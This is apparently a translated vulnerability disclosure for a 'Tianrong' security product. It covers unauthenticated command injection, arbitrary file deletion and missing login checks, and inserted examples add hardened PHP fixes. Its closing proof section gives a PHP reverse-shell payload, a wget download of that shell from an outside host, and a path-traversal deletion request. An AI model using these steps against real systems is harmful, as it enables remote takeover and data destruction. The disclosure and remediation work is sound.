Tianrong: five high-risk vulnerabilities in one package, final edition (no login required)
This Tianrong product bundles several high-risk vulnerabilities: command execution, arbitrary file deletion, and a global design defect (missing login checks). None of them requires logging in, and together they yield a working shell.
0x01 Multiple command execution vulnerabilities
File: direct/polling/CommandsPolling.php
include_once 'command/CCmdsPolling.php';
$command  = isset($_POST['command'])  ? $_POST['command']  : "";
$saveFile = isset($_POST['filename']) ? $_POST['filename'] : "";
$cmdParam = isset($_POST['cmdParam']) ? $_POST['cmdParam'] : "";
$cmdParam = trim($cmdParam);
$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "")));
// command is null
if(empty($command)) { echo $faultStr; exit(); }
// exec and get result
$result = array();
$pollingObj = new CCmdsPolling();
if($command == "ping") {
    $result = $pollingObj->getPingInfo($cmdParam, $saveFile);
} else if ($command == "traceroute") {
    $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);
} else {
    echo $faultStr; exit();
}
First command execution:
When $command == "ping", $cmdParam and $saveFile are passed to getPingInfo().
Follow the call into command/CCmdsPolling.php:
function getPingInfo($pingIp, $saveFile) {
    $info = array();
    if (empty($saveFile)) {
        $saveFile = self::ping($pingIp); // first request: run the command and create the output file
    }
When $saveFile is empty, execution continues into ping():
function ping($ip) {
    if(empty($ip)) return "";
    $filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";
    if($ip && $filename) {
        if(file_exists($filename)) {
            unlink($filename);
        }
        $cmd = "ping -c 5 $ip > $filename 2>&1 &";
        exec("$cmd ");
    }
    return $filename;
}
Note the line $filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";
Follow getClientAddr():
function getClientAddr(){
    unset($onlineip);
    if($_SERVER['HTTP_CLIENT_IP']) {
        $onlineip = $_SERVER['HTTP_CLIENT_IP'];
    } else if($_SERVER['HTTP_X_FORWARDED_FOR']) {
        $onlineip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    }
    return $onlineip;
}
The client address is taken straight from the Client-IP / X-Forwarded-For request headers and returned as-is. magic_quotes_gpc only escapes GET, POST and COOKIE data, so even with GPC = on these header values are untouched.
As a result $filename is attacker-controlled and is concatenated into the string handed to exec().
Of course $ip (cmdParam) also goes into $cmd unescaped and is executed by exec(); that vector has already been reported by someone else.
Second command execution:
When $command == "traceroute", $cmdParam and $saveFile are passed to getTracerouteInfo().
Follow getTracerouteInfo() in command/CCmdsPolling.php:
function getTracerouteInfo($address, $saveFile) {
    $info = array();
    if (empty($saveFile)) {
        $saveFile = self::traceroute($address); // first request: run the command and create the output file
    }
Follow traceroute():
function traceroute($address) {
    if(!$address) return "";
    $filename = "/tmp/" . self::getClientAddr() . "traceroute" . $address . ".txt";
    if($address && $filename) {
        if(file_exists($filename)) {
            unlink($filename);
        }
        $cmd = "traceroute -m " . self::trace_max_hops . " -n $address > $filename 2>&1 &";
        exec("$cmd ");
    }
    return $filename;
}
Note the line $filename = "/tmp/" . self::getClientAddr() . "traceroute" . $address . ".txt";
getClientAddr() is the same function shown above: it returns the raw Client-IP / X-Forwarded-For header value, which magic_quotes_gpc does not escape, so $filename is again attacker-controlled and ends up inside the string passed to exec().
And as with ping, $address (cmdParam) itself goes into $cmd unescaped; that vector has already been reported by someone else.
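The following is an added example, not the vendor's code: a hardened replacement for the ping()/traceroute() pair above. It validates the target before it can reach the shell, names the output file from the socket peer address rather than from proxy headers, hashes the inputs so no user-supplied byte reaches the filesystem path, and quotes every argument with escapeshellarg(). The output directory, the hop count and the binary paths are assumptions; the real trace_max_hops constant is not shown on the page.

```php
<?php
// Added example (not Tianrong's code). Hardened replacement for
// CCmdsPolling::ping() / traceroute(). The original concatenates the raw
// target parameter and the Client-IP / X-Forwarded-For header into both the
// shell command and the /tmp filename, so both reach exec() unescaped.

final class SafeNetTools
{
    private const OUT_DIR = '/tmp/netpolling';   // assumed output directory
    private const TRACE_MAX_HOPS = 30;            // assumed value of trace_max_hops
    private const PING_BIN = '/bin/ping';         // assumed binary locations
    private const TRACEROUTE_BIN = '/usr/bin/traceroute';

    /** Accept only a literal IPv4/IPv6 address or a plain RFC 1123 hostname. */
    public static function validateTarget(string $target): ?string
    {
        $target = trim($target);
        if (filter_var($target, FILTER_VALIDATE_IP) !== false) {
            return $target;
        }
        $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
        if (strlen($target) <= 253 && preg_match("/^{$label}(\\.{$label})*$/", $target)) {
            return $target;
        }
        return null;   // "127.0.0.1;id", "$(wget ...)" and friends end here
    }

    /** Client address for naming output: the socket peer only, never a proxy header. */
    private static function clientAddr(): string
    {
        $addr = $_SERVER['REMOTE_ADDR'] ?? '';
        return filter_var($addr, FILTER_VALIDATE_IP) !== false ? $addr : 'unknown';
    }

    /** Output path built from a hash, so no user-controlled bytes appear in it. */
    private static function outputPath(string $tool, string $target): string
    {
        if (!is_dir(self::OUT_DIR)) {
            mkdir(self::OUT_DIR, 0700, true);
        }
        return self::OUT_DIR . '/' . $tool . '_' . hash('sha256', self::clientAddr() . '|' . $target) . '.txt';
    }

    /** Accept a path the client sends back (the "filename" POST field) only if it is one of ours. */
    public static function isOwnOutput(string $path): bool
    {
        $dir = preg_quote(self::OUT_DIR, '#');
        return (bool) preg_match("#^{$dir}/(ping|traceroute)_[0-9a-f]{64}\\.txt$#", $path);
    }

    private static function run(string $tool, string $bin, array $args, string $target): ?string
    {
        $safeTarget = self::validateTarget($target);
        if ($safeTarget === null) {
            return null;                       // reject instead of passing it to the shell
        }
        $path = self::outputPath($tool, $safeTarget);
        if (file_exists($path)) {
            unlink($path);                     // safe: $path contains no attacker bytes
        }
        $argv = array_merge([$bin], $args, [$safeTarget]);
        $cmd  = implode(' ', array_map('escapeshellarg', $argv));
        // Background execution as the original does; the redirection target is quoted too.
        exec($cmd . ' > ' . escapeshellarg($path) . ' 2>&1 &');
        return $path;
    }

    public static function ping(string $target): ?string
    {
        return self::run('ping', self::PING_BIN, ['-c', '5'], $target);
    }

    public static function traceroute(string $target): ?string
    {
        return self::run('traceroute', self::TRACEROUTE_BIN, ['-m', (string) self::TRACE_MAX_HOPS, '-n'], $target);
    }
}

// Constructed inputs of the kind the page describes reaching exec() unescaped.
var_dump(SafeNetTools::validateTarget('127.0.0.1;id'));
var_dump(SafeNetTools::validateTarget('$(wget http://attacker.example/shell.php)'));
var_dump(SafeNetTools::validateTarget('2001:db8::1'));
var_dump(SafeNetTools::validateTarget('scanner.example.net'));
var_dump(SafeNetTools::isOwnOutput('/tmp/netpolling/ping_' . str_repeat('a', 64) . '.txt'));
var_dump(SafeNetTools::isOwnOutput('/etc/passwd'));
```

The two injection strings are rejected by validateTarget() and the two well-formed targets pass; isOwnOutput() is what getPingInfo()/getTracerouteInfo() should apply to the "filename" field before reading or deleting anything. escapeshellarg() alone would stop the shell metacharacters, but the allowlist is kept in front of it because ping and traceroute also interpret option-like arguments, and a value starting with "-" should never reach them.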
0x02 Arbitrary file deletion in multiple locations
First deletion:
File: task/webapi/update.php
require_once("datalayer/CDatalayer.php");
include_once "base/CShellExec.php";
$shell = new CShellExec();
$dl = new DataLayer();
$cn = $dl->connectDB();
$dl->queryDB($cn, "use scandb");
$dl->queryDB($cn, "delete from t_pluginadding");
$success = false;
$result = $dl->queryDB($cn, "select * from t_SystemProperty where System_Property='vul_current_version'");
$row = $dl->fetchArray($result);
$vulCurrentVersion = $row["System_Value"];
$dl->queryDB($cn, "update t_SystemProperty set System_value='$vulCurrentVersion' where System_Property='vul_old_version'");
set_time_limit(0);
if($_GET["package"]) {
    $filename = $_GET["package"];
    $tmpFilename = "/tmp/update_" . time() . ".des";
    $filename = trim($filename, "\\");
    $filename = "/tmp/" . $filename;
    $cmd = "/usr/sbin/openssl enc -des -d -a -in " . $filename . " -out " . $tmpFilename . " -pass pass:[email protected]";
    $shell->Execute($cmd, "", true);
    $dirname = $tmpFilename . ".dir";
    mkdir($dirname, 0777);
} else {
    ......
}
......
unlink($filename);
unlink($tmpFilename);
system("rm -rf " . $dirname);
echo $success;
?>
Note $filename = $_GET["package"]; only backslashes are trimmed and "/tmp/" is prepended, so "../" sequences survive.
Nothing between that assignment and the end of the script exits early.
Finally $filename reaches unlink(), so any file the web server user can write can be deleted.
The same script also executes a command built from $filename via $shell->Execute().
Since someone has already reported that, I will not repeat it here.
Second and third deletions:
File: direct/polling/CommandsPolling.php, the same entry point listed in full under 0x01.
$cmdParam and $saveFile are passed to getPingInfo() and getTracerouteInfo() respectively.
In getPingInfo(), when $saveFile is empty, execution enters ping() (both functions and getClientAddr() are listed in full under 0x01). The relevant lines of ping() are:
    $filename = "/tmp/" . self::getClientAddr() . "ping" . $ip . ".txt";
    if($ip && $filename) {
        if(file_exists($filename)) {
            unlink($filename);
        }
getClientAddr() takes the address from $_SERVER (the Client-IP / X-Forwarded-For headers), which magic_quotes_gpc does not escape even when it is on.
So $filename in ping() is attacker-controlled, and $filename is handed to unlink().
Because the value of $filename can be truncated with %00, the "ping"/".txt" suffix is cut off and an arbitrary file can be deleted.
The third deletion is identical to the second:
in traceroute(), $filename is built the same way, is attacker-controlled, and reaches unlink();
truncating it with %00 again allows deletion of an arbitrary file.
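An added example, not the vendor's code, of how the "package" parameter in task/webapi/update.php could be constrained before it reaches openssl, unlink() and rm -rf. The helper rejects separators, NUL bytes and traversal by construction, then confirms with realpath() that the resolved file sits directly under /tmp (so a symlink planted there cannot redirect the deletion either). The allowlisted character set for package names is an assumption.

```php
<?php
// Added example (not Tianrong's code). Safe resolution of the update.php
// "package" parameter, which the original turns into "/tmp/" . $_GET["package"]
// and later passes to a shell command and to unlink().

final class PackagePath
{
    private const BASE = '/tmp';   // the directory update.php hard-codes

    /**
     * Returns the real path of an existing regular file named $package directly
     * inside BASE, or null when the name is unacceptable. Separators and NUL are
     * refused outright, so neither "../" traversal nor %00 truncation can change
     * which file is used; realpath() then catches symlinks pointing elsewhere.
     */
    public static function resolve(string $package): ?string
    {
        if ($package === '' || strlen($package) > 255) {
            return null;
        }
        if (strpbrk($package, "/\\\0") !== false) {         // no slash, backslash or NUL
            return null;
        }
        if ($package === '.' || $package === '..') {
            return null;
        }
        if (!preg_match('/^[A-Za-z0-9._-]+$/', $package)) {  // assumed naming policy
            return null;
        }
        $real = realpath(self::BASE . '/' . $package);
        $base = realpath(self::BASE);
        if ($real === false || $base === false) {
            return null;                                      // must already exist
        }
        if (dirname($real) !== $base || !is_file($real)) {
            return null;                                      // symlink out of /tmp, or a directory
        }
        return $real;
    }
}

// How update.php would use it (the surrounding DB code is unchanged).
function decryptPackage(string $packageParam, string $passphrase): ?string
{
    $filename = PackagePath::resolve($packageParam);
    if ($filename === null) {
        http_response_code(400);
        return null;                                          // no exec, no unlink
    }
    $tmpFilename = tempnam(sys_get_temp_dir(), 'update_');   // unpredictable name, 0600
    $cmd = '/usr/sbin/openssl enc -des -d -a -in ' . escapeshellarg($filename)
         . ' -out ' . escapeshellarg($tmpFilename)
         . ' -pass ' . escapeshellarg('pass:' . $passphrase);
    exec($cmd, $output, $status);
    if ($status !== 0) {
        unlink($tmpFilename);
        return null;
    }
    return $tmpFilename;
}

// Constructed inputs, including the request shown in the page's proof section.
var_dump(PackagePath::resolve('../../../../../../../tmp/1'));   // traversal: refused
var_dump(PackagePath::resolve("update.des\0.txt"));             // NUL truncation: refused
var_dump(PackagePath::resolve('../etc/passwd'));                 // refused
```

Every rejected name returns null before any shell command or unlink() runs; only an existing regular file whose canonical parent is /tmp is returned. The later unlink($filename) in update.php is then safe, because $filename can only ever be such a file. Dropping the cleartext pass:... literal in favour of a passphrase loaded from configuration is a separate fix, but escapeshellarg() on it costs nothing.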
0x03 Global design defect
Why global? Because this is a security product, every functional operation should be reachable only after login.
Yet the operations here never check the login state at all.
So the functional pages across the whole application can be used without logging in.
The system does have a login check function.
For example, in direct/polling/progressbarPolling.php:
if(!($userName = GetSessionVariable('username'))) { // get the logged-in username
    echo json_encode(array('type' => 'event', 'name' => 'np_probe_device_alive_event', 'data' => false));
    exit();
}
Here the login state is verified: if the session has no username, the script exits. Look at GetSessionVariable().
File: base/session.php
function GetSessionVariable($key){
    return $_SESSION[netpower][$key];   // netpower is an unquoted bareword; PHP treats it as the string 'netpower'
}
It reads the username from the session.
However, this check is missing from more than 95% of the code.
For example, device/device_export.php exports device information directly,
distribute/vuldetial.php exposes plug-in vulnerability details,
policy/param_export.php exports policy information,
task/task_export.php exports task information,
and so on.
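An added example, not the vendor's code, showing how the one check the product already has (progressbarPolling.php's GetSessionVariable('username') test) can be turned into a default-deny gate. Loaded through auto_prepend_file in php.ini, it runs before every script, so the 95% of pages that forgot the check are covered without editing each one; only an explicit allowlist of scripts (the names here are assumptions) stays reachable without a session. The session layout follows base/session.php; the event name in the JSON reply is an assumption.

```php
<?php
// Added example (not Tianrong's code). Default-deny login gate, intended for
// php.ini: auto_prepend_file = /opt/netpower/require_login.php  (path assumed)

/** Scripts that must work without a session (assumed names). */
const PUBLIC_SCRIPTS = ['/login.php', '/logout.php', '/doLogin.php'];

function IsPublicScript(string $scriptName): bool
{
    // Compare the canonical script name, not REQUEST_URI, so "?x=" or "/./" tricks do not matter.
    return in_array($scriptName, PUBLIC_SCRIPTS, true);
}

/** Pure check on a session array: returns the username, or null if not logged in. */
function LoggedInUser(array $session): ?string
{
    // Same lookup as base/session.php GetSessionVariable('username'), with the key quoted.
    $user = $session['netpower']['username'] ?? null;
    return (is_string($user) && $user !== '') ? $user : null;
}

/** Reply in the product's own JSON event format and stop the script. */
function DenyUnauthenticated(): void
{
    http_response_code(401);
    header('Content-Type: application/json');
    echo json_encode(['type' => 'event', 'name' => 'np_login_required', 'data' => false]); // event name assumed
    exit();
}

function RequireLogin(): ?string
{
    if (IsPublicScript($_SERVER['SCRIPT_NAME'] ?? '')) {
        return null;                        // login page itself: nothing to enforce
    }
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $user = LoggedInUser($_SESSION);
    if ($user === null) {
        DenyUnauthenticated();
    }
    return $user;
}

// Runs on every request when prepended; device_export.php, vuldetial.php,
// param_export.php and task_export.php never execute without a username in the session.
RequireLogin();

// Constructed sessions to show the pure check in isolation.
var_dump(LoggedInUser(['netpower' => ['username' => 'admin']]));
var_dump(LoggedInUser(['netpower' => ['username' => '']]));
var_dump(LoggedInUser([]));
```

Prepending the gate inverts the failure mode: a script that omits the check is now protected by default, and only a script deliberately added to PUBLIC_SCRIPTS is exposed. The export and detail pages listed above need no change.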
Command execution proof:
With command=ping, filename empty and cmdParam non-empty:
1. Place shell.php on a VPS with the following content:
<?php
$sock = fsockopen("*.*.*.*", 61234);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
2. Inject the following command so that the target downloads shell.php into its /tmp directory:
wget http://*.*.*.*:8888/shell.php -O /tmp/shell.php
3. Inject the following command to execute the downloaded /tmp/shell.php:
php -f /tmp/shell.php
4. The reverse shell connects back successfully.
The same works with command=traceroute.
File deletion proof:
Because of the design defect, a file can be uploaded without logging in.
File: device/device_import.php
/** Upload File */
$UploadAction = 0;
$TimeLimit = 60; /* set the timeout; the default is 30 seconds, 0 means unlimited */
set_time_limit($TimeLimit);
if (move_uploaded_file($_FILES["importUpload"]["tmp_name"], "/tmp/" . $_FILES["importUpload"]["name"])) {
    chmod("/tmp/" . $_FILES["importUpload"]["name"], 0777);
    echo '{success: true, file :' . json_encode('file has been stored :' . '/tmp/' . $_FILES['ortupload']['name']) . '}';
} else {
    echo '{faliure: true, file: Upload Error !}';
}
set_time_limit(30); // restore the default timeout
?>
Upload the file to /tmp:
Upload succeeded:
Then send the request:
**.**.**.**/task/webapi/update.php?package=../../../../../../../tmp/1
This resolves to /tmp/1 and deletes it.